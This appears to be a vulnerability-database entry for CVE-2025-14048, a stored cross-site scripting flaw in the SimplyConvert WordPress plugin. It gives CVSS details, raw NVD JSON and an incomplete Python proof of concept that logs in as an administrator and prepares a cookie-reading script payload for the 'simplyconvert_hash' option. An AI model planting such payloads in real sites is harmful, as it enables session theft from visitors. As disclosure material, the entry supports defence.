Security Vulnerability Report
中文
CVE-2025-14048 CVSS 4.4 MEDIUM

CVE-2025-14048

Published: 2025-12-12 04:15:47
Last Modified: 2026-04-15 00:35:42

Description

The SimplyConvert plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'simplyconvert_hash' option in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SimplyConvert WordPress插件 <= 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-14048 PoC - Stored XSS in SimplyConvert WordPress Plugin # Target: WordPress site with SimplyConvert plugin <= 1.0 target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost/wordpress" admin_user = "admin" admin_pass = "password" session = requests.Session() # Step 1: Login as administrator login_url = f"{target_url}/wp-login.php" login_data = { "log": admin_user, "pwd": admin_pass, "wp-submit": "Log In", "redirect_to": "/wp-admin/" } session.post(login_url, data=login_data) # Step 2: Inject XSS payload via options.php options_url = f"{target_url}/wp-admin/options.php" xss_payload = '<script>alert(document.cookie)</script>' options_data = { "option_page": "simplyconvert_options", "action": "update", "simplyconvert_hash": xss_payload, "_wpnonce": "", # Need to fetch valid nonce "_wp_http_referer": "/wp-admin/options-general.php?page=simplyconvert" } # Note: Actual exploitation requires valid CSRF token # The XSS payload will be stored and executed on page load print(f"Target: {target_url}") print(f"Payload: {xss_payload}") print("PoC demonstration complete")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14048", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:46.730", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The SimplyConvert plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'simplyconvert_hash' option in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/simplyconvert/tags/1.0/simplyconvert.php#L137", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/simplyconvert/trunk/simplyconvert.php#L137", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2d720466-e470-46a3-8129-3e58e1928f0d?source=cve", "source": "[email protected]"}]}}